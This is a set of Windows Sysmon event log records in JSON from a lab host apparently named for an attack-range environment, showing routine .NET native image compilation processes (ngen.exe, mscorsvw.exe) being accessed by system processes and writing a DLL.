{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.669\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-001014611000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.669","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-001014611000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-001014611000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-001014611000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-0010F0FF1100}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-0010F0FF1100}","TargetProcessId":"612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:41.747\r\nProcessGuid: {E2A3D6B1-13CD-5F25-0000-0010F0FF1100}\r\nProcessId: 612\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\264-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll\r\nCreationUtcTime: 2020-08-01 07:03:41.747","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:41.747","ProcessGuid":"{E2A3D6B1-13CD-5F25-0000-0010F0FF1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\264-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll","CreationUtcTime":"2020-08-01 07:03:41.747","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.779\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-001092031200}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.779","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-001092031200}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.779\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-001092031200}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.779","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-001092031200}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-001092031200}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-001092031200}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.888\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-00103D071200}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.888","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-00103D071200}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
